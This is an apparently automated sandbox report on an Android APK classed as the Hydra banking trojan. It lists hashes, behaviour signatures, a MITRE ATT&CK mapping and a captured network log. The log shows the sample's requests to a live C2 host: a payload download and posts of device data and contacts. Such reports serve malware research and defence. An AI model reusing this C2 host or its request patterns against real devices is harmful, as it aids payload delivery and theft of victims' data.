Analysis

max time kernel: 148s
max time network: 155s
platform: android-11_x64
resource: android-x64-arm64-20240910-en
resource tags: arch:arm arch:arm64 arch:x64 arch:x86 image:android-x64-arm64-20240910-en locale:en-us os:android-11-x64 system
submitted: 16/02/2025, 22:01 UTC

Static task: static1

Behavioral task: behavioral1
Sample: 2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk
Resource: android-x86-arm-20240624-en

Behavioral task: behavioral2
Sample: 2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk
Resource: android-x64-20240910-en

Behavioral task: behavioral3
Sample: 2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk
Resource: android-x64-arm64-20240910-en
General

Target: 2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0.apk
Size: 4.6MB
MD5: 0d7bb33151d9a98973e47fe54a885eb1
SHA1: 0a6a1644ba3e459d1ccd949e4c55736a92c04206
SHA256: 2578dc51496376b92fefcda8030621b1287d2347a82148438542a4ebdb9657c0
SHA512: 99172dfbf2c7dbf8da541b154b5f29c1c489d5d324fcf491b3f5916a8b7602de1418e86b453aed455bdcc5f02dcc69fb371e7835f8b7e2951f14760df75524cc
SSDEEP: 98304:VffTfxT5uY19NmMy0dL5jTS4ovGniG3ElCGYlq9VvdravEXjvC:xfxT57bzV3r60i/lhiMvPq

Malware Config

Extracted
Family: hydra
C2: http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Signatures

Hydra
Android banker and info stealer.

Hydra family

Hydra payload (2 IoCs)
resource | yara_rule
behavioral3/files/fstream-3.dat | family_hydra1
behavioral3/files/fstream-3.dat | family_hydra2

Loads dropped Dex/Jar (1 TTPs, 2 IoCs)
Runs executable file dropped to the device during analysis.
ioc | pid | Process
/data/user/0/com.dfzmabwby.wbpjhioxj/app_dex/classes.dex | 4796 | com.dfzmabwby.wbpjhioxj
/data/user/0/com.dfzmabwby.wbpjhioxj/app_dex/classes.dex | 4796 | com.dfzmabwby.wbpjhioxj

Makes use of the framework's Accessibility service (4 TTPs, 2 IoCs)
Retrieves information displayed on the phone screen using AccessibilityService.
description | ioc | Process
Framework service call | android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfoByAccessibilityId | com.dfzmabwby.wbpjhioxj
Framework service call | android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfosByViewId | com.dfzmabwby.wbpjhioxj

Queries a list of all the installed applications on the device (might be used in an attempt to overlay legitimate apps) (1 TTPs)

Reads the contacts stored on the device. (1 TTPs, 1 IoCs)
description | ioc | Process
URI accessed for read | content://com.android.contacts/contacts | com.dfzmabwby.wbpjhioxj

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
29 | ip-api.com

Makes use of the framework's foreground persistence service (1 TTPs, 1 IoCs)
Application may abuse the framework's foreground service to continue running in the foreground.
description | ioc | Process
Framework service call | android.app.IActivityManager.setServiceForeground | com.dfzmabwby.wbpjhioxj

Performs UI accessibility actions on behalf of the user (1 TTPs, 1 IoCs)
Application may abuse the accessibility service to prevent its removal.
ioc | Process
android.accessibilityservice.IAccessibilityServiceConnection.performGlobalAction | com.dfzmabwby.wbpjhioxj

Queries information about active data network (1 TTPs, 1 IoCs)
description | ioc | Process
Framework service call | android.net.IConnectivityManager.getActiveNetworkInfo | com.dfzmabwby.wbpjhioxj

Queries the mobile country code (MCC) (1 TTPs, 1 IoCs)
description | ioc | Process
Framework service call | com.android.internal.telephony.ITelephony.getNetworkCountryIsoForPhone | com.dfzmabwby.wbpjhioxj

Reads information about phone network operator. (1 TTPs)

Requests uninstalling the application. (1 TTPs, 1 IoCs)
description | ioc | Process
Intent action | android.intent.action.DELETE | com.dfzmabwby.wbpjhioxj
Processes

com.dfzmabwby.wbpjhioxj (PID 4796)
- Loads dropped Dex/Jar
- Makes use of the framework's Accessibility service
- Reads the contacts stored on the device.
- Makes use of the framework's foreground persistence service
- Performs UI accessibility actions on behalf of the user
- Queries information about active data network
- Queries the mobile country code (MCC)
- Requests uninstalling the application.
Network
-
Remote address: 1.1.1.1:53
Request: www.youtube.com IN A
Response: www.youtube.com IN CNAME youtube-ui.l.google.com; youtube-ui.l.google.com IN A 142.250.200.14, 216.58.212.206, 142.250.180.14, 142.250.200.46, 216.58.213.14, 216.58.201.110, 142.250.187.238, 142.250.187.206, 172.217.16.238, 172.217.169.78, 216.58.204.78, 142.250.179.238, 142.250.178.14
-
Remote address: 1.1.1.1:53
Request: www.youtube.com IN A
-
Remote address: 1.1.1.1:53
Request: android.apis.google.com IN A
Response: android.apis.google.com IN CNAME clients.l.google.com; clients.l.google.com IN A 142.250.187.238
-
Remote address: 1.1.1.1:53
Request: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org IN A
Response: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org IN A 62.60.226.33
-
Remote address: 62.60.226.33:80
Request:
GET /payload HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:28 GMT
Content-Type: application/octet-stream
Content-Length: 997816
Connection: keep-alive
Last-Modified: Sat, 21 Sep 2024 12:25:51 GMT
ETag: "66eebb4f-f39b8"
Accept-Ranges: bytes
-
Remote address: 62.60.226.33:80
Request:
GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:02:10 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:02:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /api/mirrors HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
Content-Encoding: gzip
-
Remote address: 62.60.226.33:80
Request:
GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:28 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/lock HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 18
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:29 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 166
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 7503
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:45 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
Range: bytes=0-
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 206 Partial Content
Date: Sun, 16 Feb 2025 22:01:50 GMT
Content-Type: application/zip
Content-Length: 77713084
Connection: keep-alive
Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
ETag: "67ad9e61-4a1cebc"
Content-Range: bytes 0-77713083/77713084
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:30 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/update HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 31
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:01:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 1.1.1.1:53
Request: ssl.google-analytics.com IN A
Response: ssl.google-analytics.com IN A 216.58.213.8
-
Remote address: 1.1.1.1:53
Request: ssl.google-analytics.com IN A
-
Remote address: 1.1.1.1:53
Request: ip-api.com IN A
Response: ip-api.com IN A 208.95.112.1
-
Remote address: 208.95.112.1:80
Request:
GET /json HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: ip-api.com
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 288
Access-Control-Allow-Origin: *
X-Ttl: 22
X-Rl: 43
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/contacts HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 15
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:01:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:02:30 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:02:31 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:02:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
Range: bytes=0-
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 206 Partial Content
Date: Sun, 16 Feb 2025 22:02:51 GMT
Content-Type: application/zip
Content-Length: 77713084
Connection: keep-alive
Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
ETag: "67ad9e61-4a1cebc"
Content-Range: bytes 0-77713083/77713084
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:02:51 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:03:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip HTTP/1.1
Range: bytes=0-
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 206 Partial Content
Date: Sun, 16 Feb 2025 22:03:12 GMT
Content-Type: application/zip
Content-Length: 77713084
Connection: keep-alive
Last-Modified: Thu, 13 Feb 2025 07:25:21 GMT
ETag: "67ad9e61-4a1cebc"
Content-Range: bytes 0-77713083/77713084
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:03:12 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:03:30 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:03:31 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Sun, 16 Feb 2025 22:03:50 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Remote address: 62.60.226.33:80
Request:
POST /api/v1/device/server-log HTTP/1.1
Authorization: 94c11700a1abeaf9
Content-Type: application/json
charset: utf-8
Content-Length: 124
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
Connection: Keep-Alive
Accept-Encoding: gzip
Response:
HTTP/1.1 403 Forbidden
Date: Sun, 16 Feb 2025 22:03:51 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
-
Flows (destination | host | protocol | bytes sent | bytes received | packets sent | packets received; columns the page does not show are marked "not captured")

not captured | not captured | not captured | 1.5kB | 40 B | 2 | 1
not captured | not captured | not captured | 2.6kB | 6.0kB | 12 | 10
not captured | not captured | not captured | 2.6kB | 6.1kB | 11 | 9
not captured | not captured | not captured | 128 B | 40 B | 2 | 1

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log | http | 29.0kB | 1.1MB | 492 | 677
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/payload -> 200
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log -> 403

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip | http | 61.9kB | 2.0MB | 741 | 1190
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/mirrors -> 200
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/lock -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device -> 200
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true -> 200
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip -> 206

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log | http | 2.6kB | 1.4kB | 18 | 13
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/update -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log -> 403

not captured | not captured | not captured | 2.3kB | 8.4kB | 20 | 16
not captured | not captured | not captured | 1.6kB | 6.3kB | 11 | 9

not captured | not captured | not captured | 412 B | 597 B | 4 | 3
  GET http://ip-api.com/json -> 200

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log | http | 2.4kB | 22.6kB | 25 | 25
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/contacts -> 200
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log -> 403

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip | http | 4.6kB | 109.6kB | 75 | 82
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true -> 200
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip -> 206

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log | http | 777 B | 478 B | 6 | 4
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log -> 403

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip | http | 76.7kB | 6.1MB | 1394 | 3555
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true -> 200
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip -> 206

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log | http | 777 B | 478 B | 6 | 4
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log -> 403

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log | http | 1.7kB | 21.9kB | 18 | 21
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log -> 403

62.60.226.33:80 | http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log | http | 2.5kB | 22.0kB | 24 | 23
  GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true -> 200
  POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log -> 403

not captured | not captured | not captured | 187 B | 40 B | 3 | 1
not captured | not captured | not captured | 519 B | not captured | 7 | not captured
not captured | not captured | not captured | 128 B | 40 B | 2 | 1
not captured | not captured | not captured | 3.8kB | not captured | 12 | not captured

not captured | not captured | not captured | 122 B | 303 B | 2 | 1
  DNS request: www.youtube.com
  DNS request: www.youtube.com
  DNS response: 142.250.200.14, 216.58.212.206, 142.250.180.14, 142.250.200.46, 216.58.213.14, 216.58.201.110, 142.250.187.238, 142.250.187.206, 172.217.16.238, 172.217.169.78, 216.58.204.78, 142.250.179.238, 142.250.178.14

not captured | not captured | not captured | 69 B | 109 B | 1 | 1
  DNS request: android.apis.google.com
  DNS response: 142.250.187.238

not captured | not captured | not captured | 99 B | 115 B | 1 | 1
  DNS request: 1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
  DNS response: 62.60.226.33

not captured | not captured | not captured | 140 B | 86 B | 2 | 1
  DNS request: ssl.google-analytics.com
  DNS request: ssl.google-analytics.com
  DNS response: 216.58.213.8

not captured | not captured | not captured | 56 B | 72 B | 1 | 1
  DNS request: ip-api.com
  DNS response: 208.95.112.1
MITRE ATT&CK Mobile v15

Defense Evasion
Download New Code at Runtime (1)
Foreground Persistence (1)
Impair Defenses (1)
Prevent Application Removal (1)
Indicator Removal on Host (1)
Uninstall Malicious Application (1)
Input Injection (1)

Discovery
Software Discovery (1)
Security Software Discovery (1)
System Network Configuration Discovery (2)
System Network Connections Discovery (1)